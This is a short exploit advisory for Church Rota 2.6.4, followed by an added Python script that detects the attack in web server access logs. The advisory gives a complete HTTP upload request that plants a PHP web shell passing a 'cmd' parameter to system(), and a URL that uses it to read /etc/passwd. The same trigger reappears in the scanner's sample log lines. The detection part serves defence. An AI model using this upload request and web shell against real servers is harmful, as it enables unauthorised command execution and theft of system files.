Church Rota version 2.6.4 is vulnerable to authenticated remote code execution. The user does not need to have file upload permission in order to upload and execute an arbitrary file.

POST /resources.php?action=newsent HTTP/1.1
Host: 192.168.43.187
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: id,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------36504512417128952451539028145
Content-Length: 526
DNT: 1
Connection: close
Referer: http://192.168.43.187/resources.php?action=new
Upgrade-Insecure-Requests: 1

-----------------------------36504512417128952451539028145
Content-Disposition: form-data; name="resourcename"

test
-----------------------------36504512417128952451539028145
Content-Disposition: form-data; name="resourcefile"; filename="ex.php"
Content-Type: text/plain

<?php
$cmd=$_GET['cmd'];
system($cmd);
?>
-----------------------------36504512417128952451539028145
Content-Disposition: form-data; name="resourcedescription"

<p>pocccc</p>
-----------------------------36504512417128952451539028145--

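The uploaded file is then served from the documents directory, where the cmd parameter is passed to system():

http://192.168.43.187/documents/ex.php?cmd=cat%20/etc/passwd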
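
For detection, the following added example (not part of the original advisory or of Church Rota) scans web server access logs for script files requested under /documents/ and correlates them with an earlier POST to resources.php?action=newsent from the same client. The log format (combined log format), the sample lines, the response codes and the list of script extensions are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines; not taken from a real server.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2024:10:00:01 +0000] "GET /resources.php?action=new HTTP/1.1" 200 5120
192.0.2.10 - - [01/Jan/2024:10:00:05 +0000] "POST /resources.php?action=newsent HTTP/1.1" 302 0
192.0.2.10 - - [01/Jan/2024:10:00:09 +0000] "GET /documents/ex.php?cmd=cat%20/etc/passwd HTTP/1.1" 200 1843
192.0.2.20 - - [01/Jan/2024:10:02:00 +0000] "GET /documents/rota-march.pdf HTTP/1.1" 200 88211
192.0.2.30 - - [01/Jan/2024:10:03:00 +0000] "GET /documents/notes.PHP HTTP/1.1" 404 0
"""

LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})\b'
)
# Assumed set of extensions a PHP-enabled server may execute.
SCRIPT_RE = re.compile(r'\.(php\d?|phtml|phar)$', re.IGNORECASE)
UPLOAD_DIR = "/documents/"  # upload location shown in the advisory


def find_upload_abuse(log_text):
    """Return one finding per request for a script file in the upload directory."""
    uploaders = set()  # clients seen submitting the resource upload form
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        url = urlsplit(m["target"])
        if (m["method"] == "POST" and url.path == "/resources.php"
                and parse_qs(url.query).get("action") == ["newsent"]):
            uploaders.add(m["client"])
            continue
        if url.path.startswith(UPLOAD_DIR) and SCRIPT_RE.search(url.path):
            findings.append({
                "client": m["client"],
                "path": url.path,
                "has_query": bool(url.query),      # parameters sent to an uploaded file
                "served": m["status"] == "200",    # the file exists and was handled
                "uploaded_first": m["client"] in uploaders,
            })
    return findings


if __name__ == "__main__":
    for finding in find_upload_abuse(SAMPLE_LOG):
        print(finding)
```

A finding with served and uploaded_first both true is the highest-priority case; any script extension appearing under /documents/ at all warrants checking the directory contents.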